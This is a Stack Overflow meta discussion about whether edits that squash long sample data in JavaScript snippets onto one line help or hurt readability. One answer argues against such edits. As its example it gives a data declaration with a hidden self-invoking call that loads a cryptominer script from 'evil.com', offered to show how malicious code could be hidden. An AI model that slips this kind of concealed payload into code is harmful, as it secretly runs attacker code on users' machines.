# How to deal with a user reformatting snippet data to be in a single line

Tags: discussion, answers, stack-snippets

A user is going around reformatting Stack snippets to put all provided data on a single line, effectively turning things like this:

```javascript
const data = [{
  id: 'id1',
  entries: [{
    key: 'key1',
    value: 'value1'
  }, {
    key: 'key2',
    value: 'value2'
  }, {
    key: 'key3',
    value: 'value3'
  }]
}];

/*
  Some logic operating on the above data
*/
```

Into this:

```javascript
const data = [{id: 'id1', entries: [{key: 'key1', value: 'value1'}, {key: 'key2', value: 'value2'}, {key: 'key3', value: 'value3'}]}];

/*
  Some logic operating on the above data
*/
```

For an example, see [my answer here](https://stackoverflow.com/a/75873929/3558960) (which I have chosen to roll back), and the [other answer](https://stackoverflow.com/a/75874231/3558960) to the same question that got the same treatment from the same user.

Is this considered to be acceptable edit behavior? Does the community consider the "corrected" snippet to be more readable?

Comment: I, personally, wouldn't consider that "acceptable" no. Readability is important. Rolling back was the right call, in my opinion. If it's a constant issue, then flag a post with a custom moderator flag and explain the issue there.

Comment: FWIW I can't see that this is a reoccurring issue in the particular user's revision history.

Comment: Didn't go as far as to check the user's entire revision history. It just stood out that it happened to both answers on the same question.

Comment: @ThomA I do not really see what the issue is. I'd rather not scroll **MULTIPLE TIMES** past the same data that I've already seen just to read a few lines of code that handles it. Makes reading answers really bothersome. What is your argument that I should be doing this and it's unacceptable my preference to avoid it should be ignored? Consider that there could be 5-6 answers. Why is scrolling and seeing the same data 5-6 *additional* times so important? Consider posting an answer arguing your point.

Comment: If the data doesn't need to be in the answer, @VLAZ , then it shouldn't be in the answer. Remove it entirely. Then you don't need to scroll past it at all.

Comment: @ThomA You can process the data with the code and show off the result. I just don't want to read the whole of it again. Since whitespace is insignificant for JS objects and JS arrays, making it all in one line seems more convenient. I don't need to read all of it multiple times. I've seen it in the question already.

Comment: Which is why I ask why have it in the answer at all; clearly it's *not* needed by your arguement, @VLAZ .

Comment: @ThomA not needed *to read the data*. Also *repeatedly*. Seeing the result of the code running is still useful. Again, if you have argument *for* always leaving the data in a snippet expanded, please post it as an answer.

Comment: @ThomA it's unclear how you could have runnable snippets that demonstrate how the answer's code operates on the data (which is useful) without having the data in the snippet.  The issue is having the data take up the vast majority of the vertical space in said snippet (which is unhelpful).

Comment: When appropriate, I like to try a "best of both worlds" option: I toss my logic into a function, then the snippet flows like `<function/solution> <data> <call to function>`. Whether I minify the data or not matters less, and even if I do, there's no weird blob at the top. This would conflict with the author's intent as an edit, though, so I only apply it to my own answers. If the data is different than the OP's, best not to minify it.

Comment: Based on the title I thought you were referring to regular code snippets in posts and I'd agree edits to condense these to a single line make readability objectively worse since readers now might need to scroll in 2 dimensions vs just the one. Seeing now you are specifically taking issue with the edit in stack snippets I'm inclined to agree with these types of edits since the main objective of the stack snippet is *executability*. Ideally the author provides both if the actual specific data is relevant to the issue.

Comment: @DrewReese Even for regular code blocks, I don't think it hurts readability to minify setup data into one line. Is anyone actually trying to read that setup data again (especially since it's already included in the OP)? If anything it helps readability by surfacing key parts of the answer code without having to scroll vertically.

Comment: Totally with @ggorlen on this one: as the author, there are times when you want to include the pretty white-space to explain what is going on, and the single liner for script writers (although... in the instance in question... I am not sure a single-line is really going to help anyone)

Comment: What's more concerning to me is the user seems to be actually _changing the content_, not just the formatting, which is an absolute no-no. In your first linked post, they have removed double quotes and replaced them with single quotes, and added lots of commas that were not there before.

Comment: While I agree that scrolling past LONG amounts of vertical data to see the logic is a bit of a nuisance, horizontal data is worse... the structure of the data is no longer obvious. Ideally the repeated elements in the data could be collapsed behind an ellipsis, or some other technique that would provide the best of both worlds. Perhaps the best of both worlds would be that JSON data presents itself horizontally, but with a [+/-] button to toggle between vertical/horizontal. Is that too big of an ask for this problem?

Comment: @AaronCicali: The data is pretty-printed in the question, at least in this case.  The discussion is about condensing it *in answers that copy that part of the question*.  But yeah, if there was collapse/expand support, that would be even better, instead of having to scroll back up to the question if you wanted to check something about the input.

Comment: Another option is to take advantage of JS function hoisting: `const data = getData(); <logic/solution> ... function getData() { return /* the data */ }`.

Comment: @TylerH there is no change in the data, though. The literal object is altered to an equivalent representation. `{ foo: 1 }` and `{ "foo": 1 }` and `{ 'foo': 1 }` are exactly the same in terms of what they produce. The trailing comma similarly has no impact on the data: `{ foo: 1 }` and `{ foo: 1, }` evaluate to the same object content.

Comment: @VLAZ I guess that's why JSON is evil. Changes to code content are typically forbidden for reasons like this: it can lead to confusion among readers.

Comment: @DrewReese Stack Snippets are for runnable code only; JSON is not runnable code. Aside from that, there is no difference here regarding code blocks vs stack snippets; the issue applies equally.

Comment: @TylerH I know that, and we're not discussing JSON here. OP is specifically referring to Stack snippets though, and provided a non-stack-snippet example.

Answer (score 38):

When the data is quite long, verbatim from the question (where the user left it expanded), not an important part of the answer, and the edits are to the answers that copied the extremely long sample data out of the question...**yes, those were helpful edits that improved readability**.

Using the other answer as a particularly clear example, which of these is more readable?

The one where the code that answers the question is visible
[image: screenshot of an answer with one line of sample data followed by code]

or the one where it is not?
[image: screenshot of answer where only sample data is visible]

Comment: That's a fair point. Unless the snippet is very short, I always try to put the salient parts of my solution in the explanation, and then just follow up with a snippet to demonstrate that it actually works. I do agree that for users who only post a snippet, the important parts sometimes tend to get lost.

Comment: @RobbyCornelissen Yeah, yours is honestly fine either way, given that you pulled the relevant part out and led with it.  But the other answer was definitely improved by the edit.

Comment: To add to this: so as to avoid that sort of repetitive visual noise, it's common in answers for non-JavaScript questions to elide this sort of example data by simply omitting that declaration (and perhaps alluding to it in the text), or perhaps something like `grpdet = # as before...` (with whatever language-appropriate commenting syntax). However, for Stack snippets, the **point** is for the example to be runnable as-is, so the data actually needs to be there. Condensing it into one line - since JavaScript syntax allows for it - is the logical compromise.

Comment: @KarlKnechtel Even for non-snippets, I don't get why some people do `grpdet = # as before`. It still wastes 1 line, except now the code block is no longer self-contained/runnable. Why not just use that 1 line to provide a minified one-liner? Maybe they're adhering to some personal dogmatic rule about linting/formatting.

Comment: @ThomasWeller it's not even really unreasonably long...it's just long when pretty-printed.

Comment: When using a Stack Snippet with data like this that's supplied by the question, I've often put it in a `<script>` tag in the HTML section of the Stack Snippet with a clear comment as to it being from the question and that it's only setup/common data. That allows the Stack Snippet's JavaScript section to be the focus for the code that's the answer/showing how to solve the problem. I find that having the data/setup from the question be completely separate makes it more clear what's been supplied as an answer, rather than mixing together both the question data and the code for the answer.

Comment: @tdy for other languages - since snippets aren't applicable - there isn't the same pressure to make examples *independently* runnable and *self-contained*. That said, I agree that it would normally be better to explain something like "given a `grpdet` initialized as before, ..." in the prose before that code block.

Answer (score 4):

I don't think this is *that* fine.

This literally makes this part of the code **less** readable. After all the goal is to allow the answer readers to *not* read that part. This means we're encouraging users to run random scripts on their computers that they didn't read.
If this becomes the norm, reviewers will get more and more trouble detecting stuff like

```js
const data = [{id: 'id1', entries: [{key: 'key1', value: 'value1'}, {key: 'key2', value: 'value2'}, {key: 'key3', [((()=>{$.loadScript("://evil.com/cryptominer.js")})(),"value")]: 'value3'}]}];
/*
  Some logic operating on the above data
*/
```

For the ones not well versed into JS, this snippet would still produce the correct object, so the original snippet would still run as expected, except that it would also call some potentially nefast code at the same time.
Here the dataset is still relatively short, and I didn't try to obfuscate the "nefast" part that much, but it's easy to see how it can become harder to spot.

If you really think the dataset is obstructing the answer, then it's probably better to extract the important stuff out of the snippet inside the prose, and tick the "hide snippet" option.

Of course it's often fine to have small objects on single lines, but I believe that as soon as it triggers the horizontal overflow, one should refrain from doing so, moreover if it's as an edit.

Comment: If somebody is going to just hit "Run snippet" blindly, are they *really* going to pause and think it over if the data is expanded? And if somebody *really* wanted to run nefarious code, collapsing long data into a single line to add that is not really that high in terms of best ways to hide it.

Comment: @VLAZ the problem is more on the reviewing side. I know that people unfortunately do run snippets "blindly", but Stack Overflow shouldn't make a rule that encourages this behavior. Yes hiding nefarious code inside the horizontal overflown area, in a "minified" object declaration makes it a lot harder to spot. Once again I'm targetting more specifically against edits, which I believe do have less scrutinity than initial postings, moreover when reviewers will gets an habit of "oh, yet another minified dataset object, Approve.". Done sporadically it's *fine*, to make this a rule is less fine.

Comment: The case discussed here *wasn't* a suggested review. it was [a full edit](https://stackoverflow.com/posts/75873929/revisions#rev-body-23585ca0-c9ed-4743-a4ab-63d42dd1f21b) by a user with over 10k rep. So, if the intent is to prevent reviewers from accepting these - that wasn't what happened anyway. And also, if the intent is to prevent reviewers from accepting these - what about when the answerer initially posted the snippet with a minimised dataset? That's not reviewed.

Comment: @VLAZ I think "original" posts do get more attention by other readers, because these are often potential answerers and will notice if the dataset has been tempered with, but sure, it can already be bad at this stage, I didn't say otherwise. The case at hand and its current top-voted answer have been used as an excuse to [rollback a conflicting edit](https://stackoverflow.com/revisions/75874231/4), and this, by a diamond moderator. This does set a precedent, we need to see further than this one case and anticipate what this new rule means in its full context.